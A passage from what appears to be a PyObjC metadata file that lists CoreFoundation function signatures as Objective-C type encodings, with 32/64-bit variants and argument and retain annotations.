"CFUserNotificationGetResponseValue": (
sel32or64(
b"^{__CFString=}^{__CFUserNotification=}^{__CFString=}l",
b"^{__CFString=}^{__CFUserNotification=}^{__CFString=}q",
),
),
"CFRunLoopContainsTimer": (b"Z^{__CFRunLoop=}^{__CFRunLoopTimer=}^{__CFString=}",),
"CFPreferencesSetValue": (
b"v^{__CFString=}@^{__CFString=}^{__CFString=}^{__CFString=}",
),
"CFReadStreamGetStatus": (
sel32or64(b"l^{__CFReadStream=}", b"q^{__CFReadStream=}"),
),
"CFCopyTypeIDDescription": (
sel32or64(b"^{__CFString=}L", b"^{__CFString=}Q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFConvertFloatHostToSwapped": (b"{_CFSwappedFloat32=I}f",),
"CFCalendarDecomposeAbsoluteTime": (
b"Z^{__CFCalendar=}d^c",
"",
{"variadic": True},
),
"CFBinaryHeapCreate": (
sel32or64(
b"^{__CFBinaryHeap=}^{__CFAllocator=}l^{_CFBinaryHeapCallBacks=l^?^?^?^?}^{_CFBinaryHeapCompareContext=l^v^?^?^?}",
b"^{__CFBinaryHeap=}^{__CFAllocator=}q^{_CFBinaryHeapCallBacks=q^?^?^?^?}^{_CFBinaryHeapCompareContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateExternalRepresentation": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^{__CFString=}LC",
b"^{__CFData=}^{__CFAllocator=}^{__CFString=}IC",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFDateFormatterCreateISO8601Formatter": (
b"^{__CFDateFormatter=}^{__CFAllocator=}Q",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateWithFormat": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDictionary=}^{__CFString=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {2: {"printf_format": True}},
"variadic": True,
},
),
"CFBundleCopyResourceURLsOfTypeForLocalization": (
b"^{__CFArray=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFConvertFloat32HostToSwapped": (b"{_CFSwappedFloat32=I}f",),
"CFRunLoopObserverCreateWithHandler": (
sel32or64(
b"^{__CFRunLoopObserver=}^{__CFAllocator=}LZl@?",
b"^{__CFRunLoopObserver=}^{__CFAllocator=}QZq@?",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^v"},
1: {"type": b"^{__CFRunLoopObserver=}"},
2: {"type": sel32or64(b"I", b"Q")},
},
},
"block": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFRunLoopObserver=}"},
1: {"type": b"L"},
},
},
}
},
},
),
"CFDataCreate": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^vl", b"^{__CFData=}^{__CFAllocator=}^vq"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFSwapInt16HostToLittle": (b"SS",),
"CFSetCreate": (
sel32or64(
b"^{__CFSet=}^{__CFAllocator=}^^vl^{_CFSetCallBacks=l^?^?^?^?^?}",
b"^{__CFSet=}^{__CFAllocator=}^^vq^{_CFSetCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFGregorianDateGetAbsoluteTime": (
sel32or64(
b"d{_CFGregorianDate=lccccd}^{__CFTimeZone=}",
b"d{_CFGregorianDate=iccccd}^{__CFTimeZone=}",
),
),
"CFStringGetListOfAvailableEncodings": (
sel32or64(b"^L", b"^I"),
"",
{"retval": {"c_array_of_variable_length": True}},
),
"CFRunLoopTimerGetContext": (
sel32or64(
b"v^{__CFRunLoopTimer=}^{_CFRunLoopTimerContext=l^v^?^?^?}",
b"v^{__CFRunLoopTimer=}^{_CFRunLoopTimerContext=q^v^?^?^?}",
),
),
"CFXMLParserAbort": (
sel32or64(
b"v^{__CFXMLParser=}l^{__CFString=}", b"v^{__CFXMLParser=}q^{__CFString=}"
),
),
"CFPropertyListCreateFromXMLData": (
sel32or64(
b"@^{__CFAllocator=}^{__CFData=}L^^{__CFString=}",
b"@^{__CFAllocator=}^{__CFData=}Q^^{__CFString=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}},
},
),
"CFStringFindAndReplace": (
sel32or64(
b"l^{__CFString=}^{__CFString=}^{__CFString=}{_CFRange=ll}L",
b"q^{__CFString=}^{__CFString=}^{__CFString=}{_CFRange=qq}Q",
),
),
"CFDictionaryGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleGetDevelopmentRegion": (b"^{__CFString=}^{__CFBundle=}",),
"CFBundleGetMainBundle": (b"^{__CFBundle=}",),
"CFXMLNodeCreate": (
sel32or64(
b"^{__CFXMLNode=}^{__CFAllocator=}l^{__CFString=}^vl",
b"^{__CFXMLNode=}^{__CFAllocator=}q^{__CFString=}^vq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleUnloadExecutable": (b"v^{__CFBundle=}",),
"CFArrayGetCountOfValue": (
sel32or64(b"l^{__CFArray=}{_CFRange=ll}@", b"q^{__CFArray=}{_CFRange=qq}@"),
),
"CFRunLoopTimerIsValid": (b"Z^{__CFRunLoopTimer=}",),
"CFConvertFloat64SwappedToHost": (b"d{_CFSwappedFloat64=Q}",),
"CFReadStreamHasBytesAvailable": (b"Z^{__CFReadStream=}",),
"CFDataSetLength": (sel32or64(b"v^{__CFData=}l", b"v^{__CFData=}q"),),
"CFStringTokenizerCreate": (
sel32or64(
b"^{__CFStringTokenizer=}^{__CFAllocator=}^{__CFString=}{_CFRange=ll}L^{__CFLocale=}",
b"^{__CFStringTokenizer=}^{__CFAllocator=}^{__CFString=}{_CFRange=qq}Q^{__CFLocale=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortGetTypeID": (sel32or64(b"L", b"Q"),),
"CFTreeGetChildAtIndex": (
sel32or64(b"^{__CFTree=}^{__CFTree=}l", b"^{__CFTree=}^{__CFTree=}q"),
),
"CFSwapInt16BigToHost": (b"SS",),
"CFStringCreateWithCharacters": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^Tl", b"^{__CFString=}^{__CFAllocator=}^Tq"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFUserNotificationCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFUserNotification=}^?l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFUserNotification=}^?q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFUserNotification=}"},
1: {"type": sel32or64(b"i", b"q")},
},
},
"function_pointer_retained": True,
}
},
},
),
"CFStringTrimWhitespace": (b"v^{__CFString=}",),
"CFMessagePortCreateRemote": (
b"^{__CFMessagePort=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringDelete": (
sel32or64(b"v^{__CFString=}{_CFRange=ll}", b"v^{__CFString=}{_CFRange=qq}"),
),
"CFBundleCopyResourceURLInDirectory": (
b"^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeFindRoot": (b"^{__CFTree=}^{__CFTree=}",),
"CFLocaleCopyDisplayNameForPropertyValue": (
b"^{__CFString=}^{__CFLocale=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringTokenizerGetTypeID": (sel32or64(b"L", b"Q"),),
"CFSocketGetSocketFlags": (sel32or64(b"L^{__CFSocket=}", b"Q^{__CFSocket=}"),),
"CFLocaleGetLanguageLineDirection": (
sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),
),
"CFCopyHomeDirectoryURL": (
b"^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDCreateFromString": (
b"^{__CFUUID=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesCopyApplicationList": (
b"^{__CFArray=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorCopyUserInfo": (
b"^{__CFDictionary=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortIsValid": (b"Z^{__CFMachPort=}",),
"CFCalendarComposeAbsoluteTime": (b"Z^{__CFCalendar=}^d^c", "", {"variadic": True}),
"CFReadStreamUnscheduleFromRunLoop": (
b"v^{__CFReadStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFDictionaryGetValue": (b"@^{__CFDictionary=}@",),
"CFReadStreamCreateWithBytesNoCopy": (
sel32or64(
b"^{__CFReadStream=}^{__CFAllocator=}^vl^{__CFAllocator=}",
b"^{__CFReadStream=}^{__CFAllocator=}^vq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFSwapInt32LittleToHost": (b"II",),
"CFBinaryHeapRemoveAllValues": (b"v^{__CFBinaryHeap=}",),
"CFWriteStreamGetStatus": (
sel32or64(b"l^{__CFWriteStream=}", b"q^{__CFWriteStream=}"),
),
"CFURLCreateFileReferenceURL": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFRunLoopObserverGetActivities": (
sel32or64(b"L^{__CFRunLoopObserver=}", b"Q^{__CFRunLoopObserver=}"),
),
"CFTimeZoneCreateWithTimeIntervalFromGMT": (
b"^{__CFTimeZone=}^{__CFAllocator=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFPropertyListCreateWithStream": (
sel32or64(
b"@^{__CFAllocator=}^{__CFReadStream=}lL^l^^{__CFError=}",
b"@^{__CFAllocator=}^{__CFReadStream=}qQ^q^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {"type_modifier": "o"},
5: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFFileSecurityClearProperties": (
sel32or64(b"Z^{__CFFileSecurity=}L", b"Z^{__CFFileSecurity=}Q"),
),
"CFURLCopyResourcePropertyForKey": (
b"Z^{__CFURL=}^{__CFString=}^@^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {"already_cfretained": True, "type_modifier": "o"},
3: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFDateFormatterCopyProperty": (
b"@^{__CFDateFormatter=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSwapInt64LittleToHost": (b"QQ",),
"CFUserNotificationReceiveResponse": (
sel32or64(b"l^{__CFUserNotification=}d^L", b"i^{__CFUserNotification=}d^Q"),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFNumberFormatterGetLocale": (b"^{__CFLocale=}^{__CFNumberFormatter=}",),
"CFURLStartAccessingSecurityScopedResource": (b"Z^{__CFURL=}",),
"CFMachPortCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMachPort=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFMachPort=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFURLGetBytes": (
sel32or64(b"l^{__CFURL=}^Cl", b"q^{__CFURL=}^Cq"),
"",
{
"arguments": {
1: {
"c_array_length_in_arg": 2,
"c_array_length_in_result": True,
"type_modifier": "o",
}
}
},
),
"CFFileDescriptorGetNativeDescriptor": (b"i^{__CFFileDescriptor=}",),
"CFTimeZoneSetAbbreviationDictionary": (b"v^{__CFDictionary=}",),
"CFUserNotificationGetTypeID": (sel32or64(b"L", b"Q"),),
"CFTimeZoneCopySystem": (
b"^{__CFTimeZone=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFShowStr": (b"v^{__CFString=}",),
"CFURLEnumeratorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyResourceURL": (
b"^{__CFURL=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetBits": (
sel32or64(
b"v^{__CFBitVector=}{_CFRange=ll}^C", b"v^{__CFBitVector=}{_CFRange=qq}^C"
),
"",
{"arguments": {2: {"c_array_of_variable_length": True, "type_modifier": "o"}}},
),
"CFFileSecuritySetGroup": (b"Z^{__CFFileSecurity=}I",),
"CFNotificationCenterGetLocalCenter": (b"^{__CFNotificationCenter=}",),
"CFTimeZoneGetData": (b"^{__CFData=}^{__CFTimeZone=}",),
"CFArrayReplaceValues": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^@l", b"v^{__CFArray=}{_CFRange=qq}^@q"),
"",
{"arguments": {2: {"c_array_length_in_arg": 3, "type_modifier": "n"}}},
),
"CFStringGetCharactersPtr": (
b"^T^{__CFString=}",
"",
{"retval": {"c_array_delimited_by_null": True}},
),
"CFStringTokenizerGoToTokenAtIndex": (
sel32or64(b"L^{__CFStringTokenizer=}l", b"Q^{__CFStringTokenizer=}q"),
),
"CFBundleGetIdentifier": (b"^{__CFString=}^{__CFBundle=}",),
"CFTreeApplyFunctionToChildren": (
b"v^{__CFTree=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFDataGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopAddCommonMode": (b"v^{__CFRunLoop=}^{__CFString=}",),
"CFCalendarSetLocale": (b"v^{__CFCalendar=}^{__CFLocale=}",),
"CFStreamCreatePairWithSocketToHost": (
sel32or64(
b"v^{__CFAllocator=}^{__CFString=}L^^{__CFReadStream=}^^{__CFWriteStream=}",
b"v^{__CFAllocator=}^{__CFString=}I^^{__CFReadStream=}^^{__CFWriteStream=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}, 4: {"type_modifier": "o"}},
},
),
"CFNumberCreate": (
sel32or64(
b"^{__CFNumber=}^{__CFAllocator=}l^v", b"^{__CFNumber=}^{__CFAllocator=}q^v"
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetAddCharactersInRange": (
sel32or64(
b"v^{__CFCharacterSet=}{_CFRange=ll}", b"v^{__CFCharacterSet=}{_CFRange=qq}"
),
),
"CFMessagePortIsRemote": (b"Z^{__CFMessagePort=}",),
"CFURLGetTypeID": (sel32or64(b"L", b"Q"),),
"CFReadStreamGetError": (
sel32or64(
b"{_CFStreamError=ll}^{__CFReadStream=}",
b"{_CFStreamError=qi}^{__CFReadStream=}",
),
),
"CFBagCreateMutableCopy": (
sel32or64(
b"^{__CFBag=}^{__CFAllocator=}l^{__CFBag=}",
b"^{__CFBag=}^{__CFAllocator=}q^{__CFBag=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamCreateWithAllocatedBuffers": (
b"^{__CFWriteStream=}^{__CFAllocator=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBagGetTypeID": (sel32or64(b"L", b"Q"),),
"CFCalendarGetTimeRangeOfUnit": (
sel32or64(b"Z^{__CFCalendar=}Ld^d^d", b"Z^{__CFCalendar=}Qd^d^d"),
"",
{"arguments": {3: {"type_modifier": "o"}, 4: {"type_modifier": "o"}}},
),
"CFBundlePreflightExecutable": (
b"Z^{__CFBundle=}^^{__CFError=}",
"",
{
"arguments": {
1: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFArrayRemoveAllValues": (b"v^{__CFArray=}",),
"CFStringGetLineBounds": (
sel32or64(
b"v^{__CFString=}{_CFRange=ll}^l^l^l", b"v^{__CFString=}{_CFRange=qq}^q^q^q"
),
"",
{
"arguments": {
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
4: {"type_modifier": "o"},
}
},
),
"CFTimeZoneCopyAbbreviation": (
b"^{__CFString=}^{__CFTimeZone=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFFileSecurityGetGroup": (
b"Z^{__CFFileSecurity=}^I",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFCharacterSetGetPredefined": (
sel32or64(b"^{__CFCharacterSet=}l", b"^{__CFCharacterSet=}q"),
),
"CFArrayRemoveValueAtIndex": (sel32or64(b"v^{__CFArray=}l", b"v^{__CFArray=}q"),),
"CFStringGetSmallestEncoding": (sel32or64(b"L^{__CFString=}", b"I^{__CFString=}"),),
"CFTreeAppendChild": (b"v^{__CFTree=}^{__CFTree=}",),
"CFURLCreatePropertyFromResource": (
sel32or64(
b"@^{__CFAllocator=}^{__CFURL=}^{__CFString=}^l",
b"@^{__CFAllocator=}^{__CFURL=}^{__CFString=}^i",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}},
},
),
"CFURLCopyHostName": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAbsoluteTimeGetDayOfWeek": (
sel32or64(b"ld^{__CFTimeZone=}", b"id^{__CFTimeZone=}"),
),
"CFSwapInt64HostToLittle": (b"QQ",),
"CFArrayExchangeValuesAtIndices": (
sel32or64(b"v^{__CFArray=}ll", b"v^{__CFArray=}qq"),
),
"CFTimeZoneGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopObserverCreate": (
sel32or64(
b"^{__CFRunLoopObserver=}^{__CFAllocator=}LZl^?^{_CFRunLoopObserverContext=l^v^?^?^?}",
b"^{__CFRunLoopObserver=}^{__CFAllocator=}QZq^?^{_CFRunLoopObserverContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
4: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFRunLoopObserver=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
},
},
),
"CFRunLoopTimerGetTolerance": (b"d^{__CFRunLoopTimer=}",),
"CFBinaryHeapCreateCopy": (
sel32or64(
b"^{__CFBinaryHeap=}^{__CFAllocator=}l^{__CFBinaryHeap=}",
b"^{__CFBinaryHeap=}^{__CFAllocator=}q^{__CFBinaryHeap=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateFromExternalRepresentation": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFData=}L",
b"^{__CFString=}^{__CFAllocator=}^{__CFData=}I",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFTimeZoneResetSystem": (b"v",),
"CFStringNormalize": (sel32or64(b"v^{__CFString=}l", b"v^{__CFString=}q"),),
"CFRunLoopContainsSource": (
b"Z^{__CFRunLoop=}^{__CFRunLoopSource=}^{__CFString=}",
),
"CFLocaleCreateCanonicalLanguageIdentifierFromString": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopGetTypeID": (sel32or64(b"L", b"Q"),),
"CFDictionaryApplyFunction": (
b"v^{__CFDictionary=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFLocaleGetLanguageCharacterDirection": (
sel32or64(b"l^{__CFString=}", b"q^{__CFString=}"),
),
"CFStringCreateArrayWithFindResults": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}^{__CFString=}^{__CFString=}{_CFRange=ll}L",
b"^{__CFArray=}^{__CFAllocator=}^{__CFString=}^{__CFString=}{_CFRange=qq}Q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetTypeID": (sel32or64(b"L", b"Q"),),
"CFNumberFormatterSetFormat": (b"v^{__CFNumberFormatter=}^{__CFString=}",),
"CFStreamCreatePairWithSocket": (
b"v^{__CFAllocator=}i^^{__CFReadStream=}^^{__CFWriteStream=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {2: {"type_modifier": "o"}, 3: {"type_modifier": "o"}},
},
),
"CFBitVectorCreateMutableCopy": (
sel32or64(
b"^{__CFBitVector=}^{__CFAllocator=}l^{__CFBitVector=}",
b"^{__CFBitVector=}^{__CFAllocator=}q^{__CFBitVector=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesGetAppBooleanValue": (
b"Z^{__CFString=}^{__CFString=}^Z",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFSocketSetAddress": (
sel32or64(b"l^{__CFSocket=}^{__CFData=}", b"q^{__CFSocket=}^{__CFData=}"),
),
"CFRunLoopCopyAllModes": (
b"^{__CFArray=}^{__CFRunLoop=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateStringByReplacingPercentEscapesUsingEncoding": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}L",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}I",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopRun": (b"v",),
"CFPreferencesGetAppIntegerValue": (
sel32or64(
b"l^{__CFString=}^{__CFString=}^Z", b"q^{__CFString=}^{__CFString=}^Z"
),
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFMessagePortSetName": (b"Z^{__CFMessagePort=}^{__CFString=}",),
"CFDateFormatterCreate": (
sel32or64(
b"^{__CFDateFormatter=}^{__CFAllocator=}^{__CFLocale=}ll",
b"^{__CFDateFormatter=}^{__CFAllocator=}^{__CFLocale=}qq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDCreateString": (
b"^{__CFString=}^{__CFAllocator=}^{__CFUUID=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberFormatterCreate": (
sel32or64(
b"^{__CFNumberFormatter=}^{__CFAllocator=}^{__CFLocale=}l",
b"^{__CFNumberFormatter=}^{__CFAllocator=}^{__CFLocale=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLParserGetStatusCode": (
sel32or64(b"l^{__CFXMLParser=}", b"q^{__CFXMLParser=}"),
),
"CFCalendarGetMinimumRangeOfUnit": (
sel32or64(b"{_CFRange=ll}^{__CFCalendar=}L", b"{_CFRange=qq}^{__CFCalendar=}Q"),
),
"CFBitVectorCreateCopy": (
b"^{__CFBitVector=}^{__CFAllocator=}^{__CFBitVector=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTimeZoneGetSecondsFromGMT": (b"d^{__CFTimeZone=}d",),
"CFRunLoopTimerDoesRepeat": (b"Z^{__CFRunLoopTimer=}",),
"CFCharacterSetCreateInvertedSet": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetParagraphBounds": (
sel32or64(
b"v^{__CFString=}{_CFRange=ll}^l^l^l", b"v^{__CFString=}{_CFRange=qq}^q^q^q"
),
"",
{
"arguments": {
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
4: {"type_modifier": "o"},
}
},
),
"CFStringGetSystemEncoding": (sel32or64(b"L", b"I"),),
"CFBundleCopyResourceURLsOfTypeInDirectory": (
b"^{__CFArray=}^{__CFURL=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringCreateMutableCopy": (
sel32or64(
b"^{__CFAttributedString=}^{__CFAllocator=}l^{__CFAttributedString=}",
b"^{__CFAttributedString=}^{__CFAllocator=}q^{__CFAttributedString=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringTokenizerGetCurrentSubTokens": (
sel32or64(
b"l^{__CFStringTokenizer=}^{_CFRange=ll}l^{__CFArray=}",
b"q^{__CFStringTokenizer=}^{_CFRange=qq}q^{__CFArray=}",
),
"",
{
"arguments": {
1: {
"c_array_length_in_result": True,
"c_array_length_in_arg": 2,
"type_modifier": "o",
}
}
},
),
"CFBundleCopyBundleURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLNodeGetInfoPtr": (b"^v^{__CFXMLNode=}",),
"CFSocketCreateConnectedToSocketSignature": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=lll^{__CFData=}}L^?^{_CFSocketContext=l^v^?^?^?}d",
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=iii^{__CFData=}}Q^?^{_CFSocketContext=q^v^?^?^?}d",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFURLCreateDataAndPropertiesFromResource": (
sel32or64(
b"Z^{__CFAllocator=}^{__CFURL=}^^{__CFData=}^^{__CFDictionary=}^{__CFArray=}^l",
b"Z^{__CFAllocator=}^{__CFURL=}^^{__CFData=}^^{__CFDictionary=}^{__CFArray=}^i",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
5: {"type_modifier": "o"},
},
},
),
"CFAbsoluteTimeGetWeekOfYear": (
sel32or64(b"ld^{__CFTimeZone=}", b"id^{__CFTimeZone=}"),
),
"CFDateFormatterSetProperty": (b"v^{__CFDateFormatter=}^{__CFString=}@",),
"CFTreeGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopStop": (b"v^{__CFRunLoop=}",),
"CFNotificationCenterPostNotification": (
b"v^{__CFNotificationCenter=}^{__CFString=}@^{__CFDictionary=}Z",
),
"CFXMLTreeCreateFromData": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Ll",
b"^{__CFTree=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Qq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyBuiltInPlugInsURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLTreeCreateWithDataFromURL": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{__CFURL=}Ll",
b"^{__CFTree=}^{__CFAllocator=}^{__CFURL=}Qq",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCreateComponentsFromLocaleIdentifier": (
b"^{__CFDictionary=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPropertyListIsValid": (sel32or64(b"Z@l", b"Z@q"),),
"CFNumberFormatterGetDecimalInfoForCurrencyCode": (
b"Z^{__CFString=}^i^d",
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFSocketEnableCallBacks": (sel32or64(b"v^{__CFSocket=}L", b"v^{__CFSocket=}Q"),),
"CFSetCreateCopy": (
b"^{__CFSet=}^{__CFAllocator=}^{__CFSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSwapInt64BigToHost": (b"QQ",),
"CFReadStreamGetTypeID": (sel32or64(b"L", b"Q"),),
"CFFileDescriptorCreate": (
sel32or64(
b"^{__CFFileDescriptor=}^{__CFAllocator=}iZ^?^{_CFFileDescriptorContext=l^v^?^?^?}",
b"^{__CFFileDescriptor=}^{__CFAllocator=}iZ^?^{_CFFileDescriptorContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFFileDescriptor=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
},
},
),
"CFBagCreateMutable": (
sel32or64(
b"^{__CFBag=}^{__CFAllocator=}l^{_CFBagCallBacks=l^?^?^?^?^?}",
b"^{__CFBag=}^{__CFAllocator=}q^{_CFBagCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateWithString": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryAddValue": (b"v^{__CFDictionary=}@@",),
"CFFileSecurityCreateCopy": (
b"^{__CFFileSecurity=}^{__CFAllocator=}^{__CFFileSecurity=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetRemoveCharactersInString": (b"v^{__CFCharacterSet=}^{__CFString=}",),
"CFRunLoopRemoveObserver": (
b"v^{__CFRunLoop=}^{__CFRunLoopObserver=}^{__CFString=}",
),
"CFAttributedStringGetMutableString": (b"^{__CFString=}^{__CFAttributedString=}",),
"CFDictionaryCreate": (
sel32or64(
b"^{__CFDictionary=}^{__CFAllocator=}^^v^^vl^{_CFDictionaryKeyCallBacks=l^?^?^?^?^?}^{_CFDictionaryValueCallBacks=l^?^?^?^?}",
b"^{__CFDictionary=}^{__CFAllocator=}^^v^^vq^{_CFDictionaryKeyCallBacks=q^?^?^?^?^?}^{_CFDictionaryValueCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberGetByteSize": (sel32or64(b"l^{__CFNumber=}", b"q^{__CFNumber=}"),),
"CFXMLParserCopyErrorDescription": (
b"^{__CFString=}^{__CFXMLParser=}",
"",
{"retval": {"already_cfretained": True}},
),
